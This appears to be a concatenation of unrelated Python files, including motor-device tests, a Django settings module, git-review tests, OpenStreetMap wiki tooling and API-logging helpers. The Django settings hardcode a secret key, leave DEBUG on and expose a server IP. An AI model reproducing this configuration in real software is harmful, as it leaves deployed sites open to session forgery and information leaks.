logger.debug('test_mv_ginput')
# Importing forces backend selection, so do inside method
from matplotlib import pyplot as plt # NOQA
def fake_plot(*args, **kwargs):
return
def fake_ginput(*args, **kwargs):
return [[12, 24]]
def fake_get_fignums(*args, **kwargs):
return local_get_fignums
monkeypatch.setattr(plt, 'plot', fake_plot)
monkeypatch.setattr(plt, 'ginput', fake_ginput)
monkeypatch.setattr(plt, 'get_fignums', fake_get_fignums)
def inner_test():
fast_motor.mv_ginput()
assert fast_motor.position == 12
fast_motor.move(0)
assert fast_motor.position == 0
local_get_fignums = True
inner_test()
local_get_fignums = False
inner_test()
fast_motor._limits = (-100, 100)
inner_test()
def test_presets(presets, fast_motor):
logger.debug('test_presets')
fast_motor.mv(4, wait=True)
fast_motor.presets.add_hutch('four', comment='four!')
fast_motor.mv(3, wait=True)
fast_motor.presets.add_hutch('zero', 0, comment='center')
fast_motor.presets.add_here_user('sample')
print(fast_motor.presets.positions)
assert fast_motor.wm_zero() == -3
assert fast_motor.wm_sample() == 0
assert fast_motor.wm_four() == 1
# Clear paths, refresh, should still exist
old_paths = fast_motor.presets._paths
setup_preset_paths()
assert not hasattr(fast_motor, 'wm_zero')
setup_preset_paths(**old_paths)
assert fast_motor.wm_zero() == -3
assert fast_motor.wm_sample() == 0
fast_motor.mv_zero(wait=True)
fast_motor.mvr(1, wait=True)
assert fast_motor.wm_zero() == -1
assert fast_motor.wm() == 1
# Sleep for one so we don't override old history
time.sleep(1)
fast_motor.presets.positions.zero.update_pos(comment='hats')
assert fast_motor.wm_zero() == 0
assert fast_motor.presets.positions.zero.pos == 1
assert len(fast_motor.presets.positions.zero.history) == 2
assert len(fast_motor.presets.positions.sample.history) == 1
repr(fast_motor.presets.positions.zero)
fast_motor.presets.positions.zero.deactivate()
with pytest.raises(AttributeError):
fast_motor.wm_zero()
with pytest.raises(AttributeError):
fast_motor.presets.positions.zero
fast_motor.umv_sample()
assert fast_motor.wm() == 3
fast_motor.presets.positions.sample.update_comment('hello there')
assert len(fast_motor.presets.positions.sample.history) == 2
def block_file(path, lock):
with open(path, 'r+') as f:
fcntl.flock(f, fcntl.LOCK_EX)
lock.acquire()
fcntl.flock(f, fcntl.LOCK_UN)
path = fast_motor.presets.positions.sample.path
lock = mp.Lock()
with lock:
proc = mp.Process(target=block_file, args=(path, lock))
proc.start()
time.sleep(0.2)
assert fast_motor.presets.positions.sample.pos == 3
fast_motor.presets.positions.sample.update_pos(2)
assert not hasattr(fast_motor, 'wm_sample')
fast_motor.presets.sync()
assert not hasattr(fast_motor, 'mv_sample')
proc.join()
fast_motor.presets.sync()
assert hasattr(fast_motor, 'mv_sample')
def test_presets_type(presets, fast_motor):
logger.debug('test_presets_type')
# Mess up the input types, fail before opening the file
with pytest.raises(TypeError):
fast_motor.presets.add_here_user(123)
with pytest.raises(TypeError):
fast_motor.presets.add_user(234234, 'cats')
def test_engineering_mode():
logger.debug('test_engineering_mode')
set_engineering_mode(False)
assert not get_engineering_mode()
set_engineering_mode(True)
assert get_engineering_mode()
def test_dir_whitelist_basic(fast_motor):
logger.debug('test_dir_whitelist_basic')
set_engineering_mode(False)
user_dir = dir(fast_motor)
set_engineering_mode(True)
eng_dir = dir(fast_motor)
assert len(eng_dir) > len(user_dir)
_TAB_COMPLETION_IGNORES = {'.areadetector.', }
def _should_check_tab_completion(cls):
"""Filter out classes for checking tab completion."""
if BaseInterface in cls.mro():
# Include any Devices that have BaseInterface
return True
fully_qualified_name = f'{cls.__module__}.{cls.__name__}'
if any(name in fully_qualified_name for name in _TAB_COMPLETION_IGNORES):
# This doesn't mix BaseInterface in, but that's OK - it's on our list
return False
# This doesn't mix BaseInterface in, this may be a bad thing: warn in
# the test.
return True
@pytest.mark.parametrize(
'cls',
[pytest.param(cls, id=f'{cls.__module__}.{cls.__name__}')
for cls in conftest.find_all_device_classes()
if _should_check_tab_completion(cls)]
)
def test_tab_completion(cls):
if BaseInterface not in cls.mro():
pytest.skip(f'{cls} does not inherit from the interface')
regex = cls._class_tab.build_regex()
if getattr(cls, 'tab_component_names', False):
for name in cls.component_names:
if getattr(cls, name).kind != ophyd.Kind.omitted:
assert regex.match(name) is not None
for name in getattr(cls, 'tab_whitelist', []):
assert regex.match(name) is not None
_STATUS_PRINT_IGNORES = {
'.AttenuatorCalculatorBase',
'.BadSlitPositionerBase',
'.DelayBase',
'.IPM_Det',
'.InOutPVStatePositioner',
'.KappaXYZStage',
'.PVPositionerComparator',
'.PVPositionerDone',
'.PVPositionerIsClose',
'.PseudoSingleInterface',
'.PulsePicker',
'.SlitsBase',
'.SyncAxesBase',
'.OffsetMotorBase',
}
def _should_check_status_prints(cls):
"""Filter out classes for checking ``status_info``."""
fully_qualified_name = f'{cls.__module__}.{cls.__name__}'
if any(name in fully_qualified_name for name in _STATUS_PRINT_IGNORES):
return False
# Otherwise, include any Devices that inherit from BaseInterface.
return BaseInterface in cls.mro()
@pytest.mark.parametrize(
'cls',
[pytest.param(cls, id=f'{cls.__module__}.{cls.__name__}')
for cls in conftest.find_all_device_classes()
if _should_check_status_prints(cls)
]
)
def test_smoke_status_prints(cls):
instance = conftest.best_effort_instantiation(cls)
status_info = instance.status_info()
print(instance.format_status_info(status_info))
def test_tab_helper_no_mixin():
class MyDevice:
...
helper = TabCompletionHelperClass(MyDevice)
with pytest.raises(AssertionError):
# Must mix in BaseInterface
helper.new_instance(MyDevice())
def test_tab_helper_class():
class MyDeviceBaseA(BaseInterface, ophyd.Device):
tab_whitelist = ['a']
a = 1
class MyDeviceBaseB:
tab_whitelist = ['b']
b = 2
class MyDevice(MyDeviceBaseA, MyDeviceBaseB):
tab_whitelist = ['c']
c = 3
foobar = 4
tab_component_names = True
cpt = ophyd.Component(ophyd.Signal)
assert MyDeviceBaseA._class_tab is not MyDevice._class_tab
assert {'a'}.issubset(MyDeviceBaseA._class_tab._includes)
assert {'a', 'b', 'c', 'cpt'}.issubset(MyDevice._class_tab._includes)
instance = MyDevice(name='instance')
tab = instance._tab
assert {'a', 'b', 'c', 'cpt'}.issubset(tab._includes)
for attr in ['a', 'b', 'c', 'cpt']:
assert attr in tab.get_filtered_dir_list()
assert 'foobar' not in tab.get_filtered_dir_list()
tab.add('foobar')
assert 'foobar' in tab.get_filtered_dir_list()
tab.remove('foobar')
assert 'foobar' not in tab.get_filtered_dir_list()
tab.add('foobar')
tab.reset()
assert 'foobar' not in tab.get_filtered_dir_list()
|
py
|
1a5edaea1ece7730661ea8f294179c8b7cfe53ee
|
# -*- coding: cp936 -*-
import numpy as np
import matplotlib.pyplot as plt
import random
def get_data(dim = 2,classes = 2,count = 1000,train_ratio = 0.8,scale = None,tightness = None,centroids = None,if_show = False):
'''
Generate data clusters randomly for classification tasks.
dim -> the dimension of the data vector
classes -> number of clusters
count -> total samples
train_ratio -> train data portion
scale -> magnitude of the data ,should be > 1
tightness -> how close the data is to its centroid
centroids -> array of centers of each cluster, shape should be (B,...), where B is the number of classes
'''
if scale is None:
scale = classes / 2
elif scale < 1:
scale = 1
if tightness is None:
tightness = 0.05 * scale / classes
if centroids is None:# generate centroids for each class
centroids = (np.random.rand(classes,dim) - 0.5) * 2 * scale
X = []
Y = []
for i in range(classes): #generate data in each class
X.append(np.random.normal(0,tightness,(count / classes,dim)) + centroids[i])
Y += [i] * (count / classes)
for i in range(count - len(Y)):#pad to required count if division left a remainder
c_idx = np.random.randint(classes)
X.append(np.random.normal(0,tightness,(1,dim))+ centroids[c_idx])
Y.append(c_idx)
X = np.concatenate(X,0)
Y = np.array(Y)
p = np.random.permutation(count)
X = X[p]
Y = Y[p]
train_count = int(count * train_ratio)
X_train = X[:train_count]
X_test = X[train_count:]
Y_train = Y[:train_count]
Y_test = Y[train_count:]
if if_show: # show only the first two dimensions, may use t-sne later
if dim < 2:
plt.subplot(121)
plt.scatter(X_train[:],[0] * len(X_train))
for i in range(min(classes * 10,int(count * train_ratio))):
plt.text(X_train[i][0],0,str(Y_train[i]))
plt.subplot(122)
plt.scatter(X_test[:],[0] * len(X_test))
for i in range(min(classes * 10,int(count * (1 - train_ratio)))):
plt.text(X_test[i][0],0,str(Y_test[i]))
else:
plt.subplot(121)
plt.xlim(-1.5 * scale,1.5 * scale)
plt.ylim(-1.5 * scale,1.5 * scale)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
plt.scatter(X_train[:][:,0],X_train[:][:,1])
for i in range(min(classes * 10,int(count * train_ratio))):
plt.text(X_train[i][0],X_train[i][1],str(Y_train[i]))
plt.subplot(122)
plt.xlim(-1.5 * scale,1.5 * scale)
plt.ylim(-1.5 * scale,1.5 * scale)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
plt.scatter(X_test[:][:,0],X_test[:][:,1])
for i in range(min(classes * 10,int(count * (1 - train_ratio)))):
plt.text(X_test[i][0],X_test[i][1],str(Y_test[i]))
plt.show()
return X_train,Y_train,X_test,Y_test
|
py
|
1a5edbdecc6d34df4900bfc63ff84e43ca583ff1
|
"""
Django settings for my_project project.
Generated by 'django-admin startproject' using Django 2.0.
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "keecm3wxmiefhilrhxjuhe"
MAIL_PSW = ""
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
"120.78.181.91:8000",
"localhost",
"0.0.0.0:8000",
"127.0.0.1",
"www.cqu.fun",
]
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.forms",
"operation",
"user",
"topic",
"captcha",
'Addon',
]
# 验证码
# CAPTCHA_CHALLENGE_FUNCT='captcha.helpers.math.challenge'
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "my_project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [os.path.join(BASE_DIR, "templates")],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"django.template.context_processors.media",
]
},
}
]
WSGI_APPLICATION = "my_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
"HOST": "120.78.181.91",
"PORT": 8000,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "zh-hans"
TIME_ZONE = "Asia/Shanghai"
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
STATICFILES_DIRS = [os.path.join(BASE_DIR, "staticfiles")]
STATIC_ROOT = os.path.join(BASE_DIR, "static")
AUTH_USER_MODEL = "user.User_Info"
MEDIA_URL = "/media/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
SESSION_COOKIE_AGE = 3600 * 2
# django_simple_captcha 验证码配置
# 噪点样式
CAPTCHA_NOISE_FUNCTIONS = ('captcha.helpers.noise_arcs', 'captcha.helpers.noise_dots')
# CAPTCHA_NOISE_FUNCTIONS = ("captcha.helpers.noise_null",)
CAPTCHA_IMAGE_SIZE = (100, 25)
# CAPTCHA_BACKGROUND_COLOR = '#ffffff'
CAPTCHA_CHALLENGE_FUNCT = (
"captcha.helpers.random_char_challenge"
) # 图片中的文字为随机英文字母,如 mdsh
CAPTCHA_CHALLENGE_FUNCT = 'captcha.helpers.math_challenge' # 图片中的文字为数字表达式,如1+2=</span>
CAPTCHA_LENGTH = 4 # 字符个数
|
py
|
1a5edd0df93ad4c52a5041b8d1fd9ec0b3446033
|
# -*- coding: utf8 -*-
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
from git_review import tests
class GitReviewTestCase(tests.BaseGitReviewTestCase):
"""Class for the git-review tests."""
def test_cloned_repo(self):
"""Test git-review on the just cloned repository."""
self._simple_change('test file modified', 'test commit message')
self.assertNotIn('Change-Id:', self._run_git('log', '-1'))
self.assertIn('remote: New Changes:', self._run_git_review())
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def _configure_gitreview_username(self):
self._run_git('config', '--add', 'gitreview.username', 'test_user')
def test_git_review_s(self):
"""Test git-review -s."""
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_s_in_detached_head(self):
"""Test git-review -s in detached HEAD state."""
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
master_sha1 = self._run_git('rev-parse', 'master')
self._run_git('checkout', master_sha1)
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_s_with_outdated_repo(self):
"""Test git-review -s with a outdated repo."""
self._simple_change('test file to outdate', 'test commit message 1')
self._run_git('push', 'origin', 'master')
self._run_git('reset', '--hard', 'HEAD^')
# Review setup with an outdated repo
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message 2')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_d(self):
"""Test git-review -d."""
self._run_git_review('-s')
# create new review to be downloaded
self._simple_change('test file modified', 'test commit message')
self._run_git_review()
change_id = self._run_git('log', '-1').split()[-1]
shutil.rmtree(self.test_dir)
# download clean Git repository and fresh change from Gerrit to it
self._run_git('clone', self.project_uri)
self._run_git('remote', 'add', 'gerrit', self.project_uri)
self._run_git_review('-d', change_id)
self.assertIn('test commit message', self._run_git('log', '-1'))
# second download should also work correct
self._run_git_review('-d', change_id)
self.assertIn('test commit message', self._run_git('show', 'HEAD'))
self.assertNotIn('test commit message',
self._run_git('show', 'HEAD^1'))
def test_multiple_changes(self):
"""Test git-review asks about multiple changes.
Should register user's wish to send two change requests by interactive
'yes' message and by the -y option.
"""
self._run_git_review('-s')
# 'yes' message
self._simple_change('test file modified 1st time',
'test commit message 1')
self._simple_change('test file modified 2nd time',
'test commit message 2')
review_res = self._run_git_review(confirm=True)
self.assertIn("Type 'yes' to confirm", review_res)
self.assertIn("Processing changes: new: 2", review_res)
# abandon changes sent to the Gerrit
head = self._run_git('rev-parse', 'HEAD')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_gerrit_cli('review', '--abandon', head)
self._run_gerrit_cli('review', '--abandon', head_1)
# -y option
self._simple_change('test file modified 3rd time',
'test commit message 3')
self._simple_change('test file modified 4th time',
'test commit message 4')
review_res = self._run_git_review('-y')
self.assertIn("Processing changes: new: 2", review_res)
def test_need_rebase_no_upload(self):
"""Test change needing a rebase does not upload."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some other message',
'create conflict with master')
exc = self.assertRaises(Exception, self._run_git_review)
self.assertIn("Errors running git rebase -p -i remotes/gerrit/master",
exc.args[0])
def test_upload_without_rebase(self):
"""Test change not needing a rebase can upload without rebasing."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message',
'just another file (no conflict)',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v')
self.assertIn("Running: git rebase -p -i remotes/gerrit/master",
review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head_1)
def test_no_rebase_check(self):
"""Test -R causes a change to be uploaded without rebase checking."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v', '-R')
self.assertNotIn('rebase', review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head_1)
def test_rebase_anyway(self):
"""Test -F causes a change to be rebased regardless."""
self._run_git_review('-s')
head = self._run_git('rev-parse', 'HEAD')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v', '-F')
self.assertIn('rebase', review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head)
def _assert_branch_would_be(self, branch):
output = self._run_git_review('-n')
# last non-empty line should be:
# git push gerrit HEAD:refs/publish/master
last_line = output.strip().split('\n')[-1]
branch_was = last_line.rsplit(' ', 1)[-1].split('/', 2)[-1]
self.assertEqual(branch, branch_was)
def test_detached_head(self):
"""Test on a detached state: we shouldn't have '(detached' as topic."""
self._run_git_review('-s')
curr_branch = self._run_git('rev-parse', '--abbrev-ref', 'HEAD')
# Note: git checkout --detach has been introduced in git 1.7.5 (2011)
self._run_git('checkout', curr_branch + '^0')
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
# switch to French, 'git branch' should return '(détaché du HEAD)'
lang_env = os.getenv('LANG', 'C')
os.environ.update(LANG='fr_FR.UTF-8')
try:
self._assert_branch_would_be(curr_branch)
finally:
os.environ.update(LANG=lang_env)
def test_bug_topic(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change for bug 123')
self._assert_branch_would_be('master/bug/123')
def test_bug_topic_newline(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change not for bug\n123')
self._assert_branch_would_be('master')
def test_bp_topic(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change for blueprint asdf')
self._assert_branch_would_be('master/bp/asdf')
def test_bp_topic_newline(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change not for bluepring\nasdf')
self._assert_branch_would_be('master')
def test_git_review_l(self):
self._run_git_review('-s')
# Populate "project" repo
self._simple_change('project: test1', 'project: change1, merged')
self._simple_change('project: test2', 'project: change2, open')
self._simple_change('project: test3', 'project: change3, abandoned')
self._run_git_review('-y')
head = self._run_git('rev-parse', 'HEAD')
head_2 = self._run_git('rev-parse', 'HEAD^^')
self._run_gerrit_cli('review', head_2, '--code-review=+2', '--submit')
self._run_gerrit_cli('review', head, '--abandon')
# Populate "project2" repo
self._run_gerrit_cli('create-project', '--empty-commit', '--name',
'test/test_project2')
project2_uri = self.project_uri.replace('test/test_project',
'test/test_project2')
self._run_git('fetch', project2_uri, 'HEAD')
self._run_git('checkout', 'FETCH_HEAD')
self._simple_change('project2: test1', 'project2: change1, open')
self._run_git('push', project2_uri, 'HEAD:refs/for/master')
# Only project1 open changes
result = self._run_git_review('-l')
self.assertNotIn('project: change1, merged', result)
self.assertIn('project: change2, open', result)
self.assertNotIn('project: change3, abandoned', result)
self.assertNotIn('project2:', result)
class HttpGitReviewTestCase(tests.HttpMixin, GitReviewTestCase):
"""Class for the git-review tests over HTTP(S)."""
def _configure_gitreview_username(self):
# trick to set http password
self._run_git('config', '--add', 'gitreview.username',
'test_user:test_pass')
|
py
|
1a5eddc8aaa61266afbe1c010cc9557747d69a78
|
import random
def embaralha(texto):
lista = list(texto)
random.shuffle(lista)
return lista
texto = input('Digite um texto: ')
print(embaralha(texto))
|
py
|
1a5ede406e51adc122680ddd030ac2edc1066adf
|
"""
Automate OpenStreetMap wiki editing.
"""
import re
from pathlib import Path
from typing import Optional
from map_machine.doc.collections import Collection
from map_machine.map_configuration import MapConfiguration
from map_machine.osm.osm_reader import Tags
from map_machine.pictogram.icon import Icon, ShapeExtractor
from map_machine.scheme import Scheme
from map_machine.workspace import Workspace
WORKSPACE: Workspace = Workspace(Path("temp"))
SCHEME: Scheme = Scheme.from_file(WORKSPACE.DEFAULT_SCHEME_PATH)
EXTRACTOR: ShapeExtractor = ShapeExtractor(
WORKSPACE.ICONS_PATH, WORKSPACE.ICONS_CONFIG_PATH
)
HEADER_PATTERN: re.Pattern = re.compile("==?=?.*==?=?")
HEADER_2_PATTERN: re.Pattern = re.compile("== .* ==")
HEADER_PATTERNS: list[re.Pattern] = [
re.compile("==\\s*Example.*=="),
re.compile("==\\s*See also\\s*=="),
]
RENDERING_HEADER_PATTERN: re.Pattern = re.compile("==\\s*Rendering.*==")
ROENTGEN_HEADER_PATTERN: re.Pattern = re.compile("===.*Röntgen.*===")
class WikiTable:
"""SVG table with icon combinations."""
def __init__(self, collection: Collection, page_name: str):
self.collection: Collection = collection
self.page_name: str = page_name
def generate_wiki_table(self) -> tuple[str, list[Icon]]:
"""
Generate Röntgen icon table for the OpenStreetMap wiki page.
"""
icons: list[Icon] = []
text: str = '{| class="wikitable"\n'
if self.collection.column_key is not None:
text += f"! {{{{Key|{self.collection.column_key}}}}}"
else:
text += "! Tag || Icon"
if self.collection.row_tags:
text += "\n"
for current_tags in self.collection.row_tags:
text += "|-\n"
text += "| "
if current_tags:
for key, value in current_tags.items():
if value == "*":
text += f"{{{{Key|{key}}}}}<br />"
else:
text += f"{{{{Tag|{key}|{value}}}}}<br />"
text = text[:-6]
text += "\n"
icon, _ = SCHEME.get_icon(
EXTRACTOR,
current_tags | self.collection.tags,
set(),
MapConfiguration(ignore_level_matching=True),
)
icons.append(icon.main_icon)
text += (
"| "
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
text += "|}\n"
return text, icons
if not self.collection.column_values:
self.collection.column_values = [""]
else:
make_vertical: bool = False
for column_value in self.collection.column_values:
if column_value and len(column_value) > 2:
make_vertical = True
for column_value in self.collection.column_values:
text += " ||"
if column_value:
tag: str = (
f"{{{{TagValue|"
f"{self.collection.column_key}|{column_value}}}}}"
)
text += " " + (
f"{{{{vert header|{tag}}}}}" if make_vertical else tag
)
text += "\n"
for row_value in self.collection.row_values:
text += "|-\n"
if row_value:
text += f"| {{{{Tag|{self.collection.row_key}|{row_value}}}}}\n"
else:
text += "|\n"
for column_value in self.collection.column_values:
current_tags: Tags = dict(self.collection.tags) | {
self.collection.row_key: row_value
}
if column_value:
current_tags |= {self.collection.column_key: column_value}
icon, _ = SCHEME.get_icon(EXTRACTOR, current_tags, set())
if not icon:
print("Icon was not constructed.")
text += (
"| "
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
icons.append(icon.main_icon)
text += "|}\n"
return text, icons
def generate_new_text(
old_text: str,
table: WikiTable,
) -> tuple[Optional[str], list[Icon]]:
"""
Generate Röntgen icon table for the OpenStreetMap wiki page.
:param old_text: previous wiki page text
:param table: wiki table generator
:return: new wiki page text
"""
wiki_text: str
icons = []
if table.collection.row_key or table.collection.row_tags:
wiki_text, icons = table.generate_wiki_table()
else:
processed = set()
icon, _ = SCHEME.get_icon(
EXTRACTOR, table.collection.tags, processed, MapConfiguration()
)
if not icon.main_icon.is_default():
wiki_text = (
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
icons.append(icon.main_icon)
elif icon.extra_icons:
wiki_text = (
f"Röntgen icon set has additional icon for the tag: "
f"[[Image:Röntgen {icon.extra_icons[0].get_name()}.svg|32px]]."
f"\n"
)
icons.append(icon.extra_icons[0])
else:
wiki_text = ""
lines: list[str] = old_text.split("\n")
# If rendering section already exists.
start: Optional[int] = None
end: int = -1
for index, line in enumerate(lines):
if HEADER_2_PATTERN.match(line):
if start is not None:
end = index
break
if RENDERING_HEADER_PATTERN.match(line):
start = index
if start is not None:
return (
"\n".join(lines[: start + 2])
+ "\n=== [[Röntgen]] icons in [[Map Machine]] ===\n"
+ f"\n{wiki_text}\n"
+ "\n".join(lines[end:])
), icons
# If Röntgen rendering section already exists.
start: Optional[int] = None
end: int = -1
for index, line in enumerate(lines):
if HEADER_PATTERN.match(line):
if start is not None:
end = index
break
if ROENTGEN_HEADER_PATTERN.match(line):
start = index
if start is not None:
return (
"\n".join(lines[: start + 2])
+ f"\n{wiki_text}\n"
+ "\n".join(lines[end:])
), icons
# Otherwise.
headers: list[Optional[int]] = [None, None]
for index, line in enumerate(lines):
for i, pattern in enumerate(HEADER_PATTERNS):
if pattern.match(line):
headers[i] = index
filtered = list(filter(lambda x: x is not None, headers))
header: int
if filtered:
header = filtered[0]
else:
lines += [""]
header = len(lines)
return (
"\n".join(lines[:header])
+ "\n== Rendering ==\n\n=== [[Röntgen]] icons in [[Map Machine]] "
"===\n\n" + wiki_text + "\n" + "\n".join(lines[header:])
), icons
|
py
|
1a5edf56e19944833e6083c289c4f3240362b0ea
|
import re
from django.conf import settings
SENSITIVE_KEYS = ['password', 'token', 'access', 'refresh']
if hasattr(settings, 'DRF_API_LOGGER_EXCLUDE_KEYS'):
if type(settings.DRF_API_LOGGER_EXCLUDE_KEYS) in (list, tuple):
SENSITIVE_KEYS.extend(settings.DRF_API_LOGGER_EXCLUDE_KEYS)
def get_headers(request=None):
"""
Function: get_headers(self, request)
Description: To get all the headers from request
"""
regex = re.compile('^HTTP_')
return dict((regex.sub('', header), value) for (header, value)
in request.META.items() if header.startswith('HTTP_'))
def get_client_ip(request):
try:
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
except:
return ''
def is_api_logger_enabled():
drf_api_logger_database = False
if hasattr(settings, 'DRF_API_LOGGER_DATABASE'):
drf_api_logger_database = settings.DRF_API_LOGGER_DATABASE
drf_api_logger_signal = False
if hasattr(settings, 'DRF_API_LOGGER_SIGNAL'):
drf_api_logger_signal = settings.DRF_API_LOGGER_SIGNAL
return drf_api_logger_database or drf_api_logger_signal
def database_log_enabled():
drf_api_logger_database = False
if hasattr(settings, 'DRF_API_LOGGER_DATABASE'):
drf_api_logger_database = settings.DRF_API_LOGGER_DATABASE
return drf_api_logger_database
def mask_sensitive_data(data):
"""
Hides sensitive keys specified in sensitive_keys settings.
Loops recursively over nested dictionaries.
"""
if type(data) != dict:
return data
for key, value in data.items():
if key in SENSITIVE_KEYS:
data[key] = "***FILTERED***"
if type(value) == dict:
data[key] = mask_sensitive_data(data[key])
if type(value) == list:
data[key] = [mask_sensitive_data(item) for item in data[key]]
return data
|
py
|
1a5ee13d4c1494faf5deed12f1f0c4a056771835
|
from .plot_expected_vs_obs import plot_expected_vs_obs
from .plot_factor_spatial import plot_categ_spatial
from .plot_factor_spatial import plot_factor_spatial
from .mapping_video import plot_spatial as plot_spatial
from .plot_in_1D import plot_absolute_abundances_1D
from .plot_in_1D import plot_density_1D
__all__ = [
"plot_density_1D",
"plot_absolute_abundances_1D",
"plot_expected_vs_obs",
"plot_factor_spatial",
"plot_categ_spatial",
"plot_spatial"
]
|
py
|
1a5ee15033a66f12e8c7bb1f9948522be76baf87
|
#!/usr/bin/env python2
# common utilities for all CDE tests
import os, time
from subprocess import *
CDE_BIN = "/home/pgbovine/CDE/cde"
CDE_EXEC = "/home/pgbovine/CDE/cde-exec"
CDE_ROOT_DIR = 'cde-package/cde-root'
def generic_lib_checks():
assert os.path.islink('cde-package/cde-root/lib/libc.so.6')
assert os.readlink('cde-package/cde-root/lib/libc.so.6') == 'libc-2.8.so'
assert os.path.isfile('cde-package/cde-root/lib/ld-linux.so.2')
def run_cde(argv, silent=False):
(stdout, stderr) = Popen([CDE_BIN] + argv, stdout=PIPE, stderr=PIPE).communicate()
if not silent:
if stderr:
print "stderr:", stderr
return (stdout, stderr)
def run_and_cmp_cde_exec(argv, prev_stdout, prev_stderr):
# to make for a tougher test, move the entire cde-package directory to /tmp
# and try to do a cde-exec run
full_pwd = os.getcwd()
full_pwd_renamed = full_pwd + '-renamed'
cur_dirname = os.path.basename(full_pwd)
tmp_test_rootdir = "/tmp/" + cur_dirname
tmp_test_dir = tmp_test_rootdir + '/cde-package/cde-root/' + full_pwd
# careful with these commands! use 'finally' to clean up even after
# exceptions!
try:
